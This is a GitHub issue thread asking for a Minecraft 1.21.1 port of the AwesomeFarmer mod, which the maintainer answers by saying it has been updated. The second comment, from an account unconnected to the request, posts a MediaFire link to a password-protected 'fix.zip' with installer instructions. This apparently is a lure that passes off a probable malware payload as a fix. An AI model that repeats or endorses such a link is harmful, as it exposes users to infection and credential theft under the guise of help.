### ISSUE TITLE
1.21.1 Port?

### ISSUE THREAD

**Issue by Danrejk** [Supchik22/AwesomeFarmer#2]
I know this mod is stupid simple, but I love it nonetheless. It's surprisingly useful for me.
I'd love to get a port to 1.21.1
And maybe a config for the blocks, but you can't have everything all at once, ha!

**Comment by xiaobai-marker** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by Supchik22** [comment]
Sorry for being late but I updated!
